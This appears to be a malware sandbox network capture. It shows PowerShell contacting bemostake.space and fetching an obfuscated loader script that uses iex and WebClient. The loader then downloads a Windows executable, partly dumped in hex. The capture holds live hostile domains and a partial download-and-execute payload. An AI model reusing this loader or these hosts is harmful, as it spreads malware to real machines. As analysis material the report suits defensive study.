Oct 8, 2024 20:52:52.674055099 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674083948 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674097061 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674108982 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674123049 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674137115 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674146891 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674158096 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674165964 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674170971 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674184084 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674196005 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674197912 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674201012 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674209118 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674227953 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674243927 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674251080 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674256086 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674268961 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674280882 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674284935 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674293995 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674308062 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674436092 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674581051 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674593925 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674606085 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.674644947 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674673080 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.674963951 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675031900 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675045013 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675220013 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.675412893 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675425053 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675436974 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675448895 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675533056 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.675533056 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.675709963 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675771952 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.675827980 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675841093 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.675930023 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.676337957 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676348925 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676395893 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.676404953 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676554918 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676565886 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676577091 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676737070 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676745892 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.676745892 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.676748991 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676805019 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.676862001 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676954031 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.676964998 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677012920 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.677098036 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677154064 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677156925 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.677165985 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677179098 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677211046 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.677536964 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677548885 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677599907 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.677601099 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677725077 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677737951 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677778959 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.677778959 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.677915096 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677927017 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677938938 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.677949905 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.678057909 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.678057909 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.678242922 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.678256035 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.678268909 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.678280115 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.678503036 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.679001093 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.679012060 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.679023027 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.679140091 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.730670929 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.756470919 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756484032 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756494999 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756547928 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756567001 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756578922 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756592035 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756599903 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.756814003 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.756829977 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756843090 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756856918 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.756869078 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757044077 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757056952 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757069111 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757081032 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757344961 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.757358074 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757370949 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757381916 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757394075 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757405996 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757416964 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757430077 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757441044 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757447004 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757452965 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757483959 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.757553101 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.757947922 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757961035 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757972956 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757986069 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.757997990 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758009911 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758009911 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.758023024 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758038044 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758064985 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.758197069 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.758385897 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758399010 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758464098 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.758559942 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758573055 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758584976 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758595943 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758606911 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758618116 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758645058 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758686066 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758698940 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758708954 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758711100 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.758711100 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.758723974 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758737087 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758749008 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758763075 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.758809090 CEST	49718	3752	192.168.2.8	147.45.126.71
Oct 8, 2024 20:52:52.759351015 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.759363890 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.759376049 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.759402037 CEST	3752	49718	147.45.126.71	192.168.2.8
Oct 8, 2024 20:52:52.759411097 CEST	49718	3752	192.168.2.8	147.45.126.71

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 8, 2024 20:52:09.592386961 CEST	192.168.2.8	1.1.1.1	0xcc86	Standard query (0)	1h982d.bemostake.space	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:52:10.908622026 CEST	192.168.2.8	1.1.1.1	0x46c6	Standard query (0)	bemostake.space	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:52:14.010189056 CEST	192.168.2.8	1.1.1.1	0x2d64	Standard query (0)	rocketdocs.lol	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 8, 2024 20:52:09.613646030 CEST	1.1.1.1	192.168.2.8	0xcc86	No error (0)	1h982d.bemostake.space	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:52:09.613646030 CEST	1.1.1.1	192.168.2.8	0xcc86	No error (0)	1h982d.bemostake.space	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:52:10.928339005 CEST	1.1.1.1	192.168.2.8	0x46c6	No error (0)	bemostake.space	188.114.96.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:52:10.928339005 CEST	1.1.1.1	192.168.2.8	0x46c6	No error (0)	bemostake.space	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:52:14.025110960 CEST	1.1.1.1	192.168.2.8	0x2d64	No error (0)	rocketdocs.lol	188.114.97.3	A (IP address)	IN (0x0001)	false
Oct 8, 2024 20:52:14.025110960 CEST	1.1.1.1	192.168.2.8	0x2d64	No error (0)	rocketdocs.lol	188.114.96.3	A (IP address)	IN (0x0001)	false

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	188.114.96.3	443	5560	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:52:10 UTC	80	OUT	GET /test.txt HTTP/1.1 Host: 1h982d.bemostake.space Connection: Keep-Alive
2024-10-08 18:52:10 UTC	636	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:52:10 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: close last-modified: Tue, 01 Oct 2024 19:01:46 GMT vary: Accept-Encoding x-turbo-charged-by: LiteSpeed cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nj8lFBDvbWtXOzJ%2FUJW4qcpqXAVkO%2FCtDYBSJo2uxn%2BrzQCiILnRMWMRPTiDP8EizwLjiwBWGttq8uBwjE2UTral99VWVDBdLONZCtZdEi5qU98tOqm2YP8skZFpbXGQADpSHJSYoMf2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf853949e23421c-EWR
2024-10-08 18:52:10 UTC	709	IN	Data Raw: 32 62 65 0d 0a 24 66 6c 6f 6c 3d 69 65 78 28 24 28 27 5b 45 6e 76 69 72 6f 6e 6d 65 6e 74 5d 3a 3a 47 65 74 45 68 31 7a 74 27 27 27 2e 52 65 70 6c 61 63 65 28 27 68 31 7a 27 2c 27 6e 76 69 72 6f 6e 6d 65 6e 74 56 61 72 69 61 62 6c 65 28 27 27 70 75 62 6c 69 63 27 27 29 20 2b 20 27 27 5c 5c 61 6a 62 73 35 30 75 6c 2e 62 61 27 29 29 29 3b 66 75 6e 63 74 69 6f 6e 20 67 65 74 69 74 28 5b 73 74 72 69 6e 67 5d 24 66 7a 2c 20 5b 73 74 72 69 6e 67 5d 24 6f 75 6c 76 29 7b 24 66 66 3d 69 65 78 28 24 28 27 28 4e 77 78 77 6c 77 2d 4f 62 6a 77 78 77 6c 63 74 20 53 79 73 74 77 78 77 6c 6d 2e 4e 77 78 77 6c 74 2e 57 77 78 77 6c 62 43 6c 69 77 78 77 6c 6e 74 29 2e 44 6f 77 6e 67 64 76 69 65 28 24 6f 75 6c 76 2e 52 65 70 6c 61 63 65 28 27 27 76 37 69 39 27 27 2c 27 27 74 Data Ascii: 2be$flol=iex($('[Environment]::GetEh1zt'''.Replace('h1z','nvironmentVariable(''public'') + ''\\ajbs50ul.ba')));function getit([string]$fz, [string]$oulv){$ff=iex($('(Nwxwlw-Objwxwlct Systwxwlm.Nwxwlt.WwxwlbCliwxwlnt).Downgdvie($oulv.Replace(''v7i9'',''t
2024-10-08 18:52:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	188.114.96.3	443	5560	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-08 18:52:11 UTC	127	OUT	GET /test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe HTTP/1.1 Host: bemostake.space Connection: Keep-Alive
2024-10-08 18:52:11 UTC	671	IN	HTTP/1.1 200 OK Date: Tue, 08 Oct 2024 18:52:11 GMT Content-Type: application/x-msdownload Content-Length: 2322503 Connection: close last-modified: Tue, 01 Oct 2024 18:58:16 GMT x-turbo-charged-by: LiteSpeed Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 50 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ntn5hdZ94YioqmREPWgzwgClkaIYoSiTZFZ9I6LEtncwZdHIFZ1zshAGzdUvtxkJsPTQzwAYjwfbpYIKDsnL9fcvpjvlxbDik8Es%2BY4T7vS8xWwCZKpsFvms7KnPngFo1A%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cf8539c1ee541de-EWR
2024-10-08 18:52:11 UTC	698	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 77 2d fc 66 00 ac 1d 00 65 18 00 00 f0 00 26 02 0b 02 02 2a 00 92 0b 00 00 a8 1d 00 00 04 00 00 d0 13 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 20 1e 00 00 04 00 00 4a dc 23 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdw-fe&*@ J#`
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 1d 00 00 02 00 00 00 92 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 04 00 00 00 f0 1d 00 00 06 00 00 00 94 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 11 00 00 00 00 1e 00 00 12 00 00 00 9a 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: @.tls@.rsrc@@.reloc@B
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: 28 e8 6f c0 0a 00 48 83 f8 01 19 c0 48 83 c4 28 c3 90 90 90 90 90 90 90 90 90 90 90 90 48 8d 0d 09 00 00 00 e9 d4 ff ff ff 0f 1f 40 00 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 83 ec 28 4c 39 c1 77 0b 48 89 d0 48 89 ca 48 83 c4 28 c3 4c 89 c2 4d 89 c8 e8 51 c0 09 00 cc 48 83 ec 28 4d 89 c2 49 29 ca 72 0e 48 01 ca 48 89 d0 4c 89 d2 48 83 c4 28 c3 4c 89 c2 4d 89 c8 e8 bb bf 09 00 cc 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 68 48 89 d6 48 89 cf 0f 57 c0 4c 8d 74 24 40 41 0f 29 46 10 41 0f 29 06 4c 8d 7c 24 20 48 8d 2d 37 ab 0b 00 4c 8d 64 24 30 41 b8 20 00 00 00 48 89 f9 4c 89 f2 e8 8f 14 00 00 48 89 c3 49 89 d5 48 89 44 24 30 48 89 54 24 38 48 85 c0 74 3d 4c 89 f9 4c 89 ea e8 74 00 00 00 0f b6 44 24 20 48 63 44 85 00 48 01 e8 ff e0 48 8b 44 24 Data Ascii: (oHH(H@H(L9wHHH(LMQH(MI)rHHLH(LMAWAVAUATVWUSHhHHWLt$@A)FA)L\|$ H-7Ld$0A HLHIHD$0HT$8Ht=LLtD$ HcDHHD$
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: 80 6e 0a 00 e9 2b 81 0a 00 48 83 ec 28 48 8b 09 e8 c0 ff ff ff 31 c0 48 83 c4 28 c3 56 48 83 ec 20 48 89 ce e8 c3 04 00 00 48 8d 4e 18 e8 ba 04 00 00 48 83 c6 30 48 89 f1 48 83 c4 20 5e e9 a9 04 00 00 56 48 83 ec 20 48 89 ce e8 d1 03 00 00 48 83 c6 18 48 89 f1 48 83 c4 20 5e e9 c0 03 00 00 56 57 53 48 83 ec 20 48 8b 31 89 f0 83 e0 03 83 f8 01 75 47 48 8b 7e ff 48 8b 5e 07 48 8b 03 48 85 c0 74 05 48 89 f9 ff d0 48 ff ce 4c 8b 43 08 4d 85 c0 74 0c 48 8b 53 10 48 89 f9 e8 94 08 00 00 ba 18 00 00 00 41 b8 08 00 00 00 48 89 f1 48 83 c4 20 5b 5f 5e e9 e8 23 00 00 90 48 83 c4 20 5b 5f 5e c3 41 57 41 56 41 55 41 54 56 57 55 53 48 83 ec 48 48 89 ce e8 44 03 00 00 48 8b 7e 28 48 89 74 24 40 48 8b 76 30 48 8d 5f 08 48 83 ee 01 72 0e 48 89 d9 e8 25 03 00 00 48 83 c3 Data Ascii: n+H(H1H(VH HHNH0HH ^VH HHHH ^VWSH H1uGH~H^HHtHHLCMtHSHAHH [_^#H [_^AWAVAUATVWUSHHHDH~(Ht$@Hv0H_HrH%H
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: 89 c1 48 89 c8 41 b8 02 00 00 00 48 89 d1 48 89 c2 e9 95 f5 ff ff 56 48 83 ec 20 48 89 ce 48 b8 00 00 00 00 00 00 00 80 48 39 01 75 19 48 89 f1 e8 5e ff ff ff 48 83 26 00 48 c7 46 08 01 00 00 00 48 83 66 10 00 48 89 f0 48 83 c4 20 5e c3 48 83 ec 38 48 b8 00 00 00 00 00 00 00 80 48 39 02 74 26 48 8b 42 30 48 89 41 30 0f 10 02 0f 10 4a 10 0f 10 52 20 0f 11 51 20 0f 11 49 10 0f 11 01 48 89 c8 48 83 c4 38 c3 48 8b 4a 08 48 8d 44 24 30 48 89 08 4c 89 44 24 20 4c 8d 0d d3 a3 0b 00 b9 01 00 00 00 31 d2 49 89 c0 e8 7c 58 09 00 cc 48 83 ec 38 48 83 39 00 75 08 8b 41 10 48 83 c4 38 c3 48 8b 41 08 8b 49 10 4c 8d 44 24 28 49 89 00 41 89 48 08 48 89 54 24 20 48 8d 0d c8 22 19 00 4c 8d 0d ab a3 0b 00 ba 13 00 00 00 e8 39 58 09 00 cc 41 57 41 56 56 57 53 48 83 ec 40 4c Data Ascii: HAHHVH HHH9uH^H&HFHfHH ^H8HH9t&HB0HA0JR Q IHH8HJHD$0HLD$ L1I\|XH8H9uAH8HAILD$(IAHHT$ H"L9XAWAVVWSH@L
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: 41 55 41 54 56 57 55 53 48 83 ec 38 48 89 d6 48 89 cf 48 8d 59 50 4c 8d 71 52 4c 8d 79 30 4c 8d 61 18 31 d2 0f b6 41 50 48 8d 2d 93 9c 0b 00 48 63 44 85 00 48 01 e8 ff e0 f6 47 60 04 75 2a 4c 8b 6f 58 48 83 67 58 00 48 89 d9 e8 39 f9 ff ff c6 47 50 03 4c 89 6f 58 b0 03 31 d2 0f b6 c0 48 63 44 85 00 48 01 e8 ff e0 8a 57 51 80 fa 02 73 31 0f b6 d2 4c 8d 05 17 a1 0b 00 4c 89 f1 e8 23 fa ff ff 49 89 d0 48 89 f1 48 89 c2 e8 c3 03 00 00 48 85 c0 0f 85 a6 03 00 00 02 57 51 88 57 51 eb ca 48 8b 4f 58 48 85 c9 74 0e 41 b8 02 00 00 00 4c 89 f2 e8 4e a2 00 00 44 0f b7 47 52 4c 8d 6c 24 20 4c 89 e9 31 d2 e8 20 b3 00 00 48 89 f9 e8 65 f9 ff ff 49 8b 45 10 48 89 47 10 41 0f 10 45 00 0f 11 07 4c 8b 6f 58 48 83 67 58 00 48 89 d9 e8 93 f8 ff ff c6 47 50 02 66 83 67 52 00 Data Ascii: AUATVWUSH8HHHYPLqRLy0La1APH-HcDHG`u*LoXHgXH9GPLoX1HcDHWQs1LL#IHHHWQWQHOXHtALNDGRLl$ L1 HeIEHGAELoXHgXHGPfgR
2024-10-08 18:52:11 UTC	1369	IN	Data Raw: 57 55 53 48 81 ec 28 01 00 00 4c 89 44 24 48 48 89 54 24 60 48 89 cb 48 ba 00 00 00 00 00 00 00 80 48 8d 41 68 48 89 44 24 50 48 8d 81 80 00 00 00 48 89 44 24 40 4c 8d a9 b0 00 00 00 48 8d 41 08 48 89 44 24 38 48 8d 41 58 48 89 44 24 58 48 8d 41 60 48 89 44 24 68 48 8b 01 48 8d 0c 02 48 ff c9 48 31 d0 45 31 e4 48 83 f9 04 49 0f 43 c4 4c 8d 35 0e 97 0b 00 49 63 04 86 4c 01 f0 31 f6 ff e0 48 89 d9 48 8b 54 24 40 e8 14 fa ff ff 48 85 c0 0f 85 56 02 00 00 48 8d 54 24 70 b9 0d 00 00 00 48 89 d7 48 89 de f3 48 a5 48 bf 00 00 00 00 00 00 00 80 48 89 3b 48 89 7b 18 48 89 7b 30 83 63 48 00 31 c0 88 43 4c c6 43 50 06 88 43 60 48 8d b4 24 d8 00 00 00 48 89 f1 e8 d9 a1 00 00 48 89 d9 e8 88 f3 ff ff 48 8d 47 01 48 89 03 48 8d 0c 07 48 ff c9 48 31 f8 45 31 e4 48 83 f9 Data Ascii: 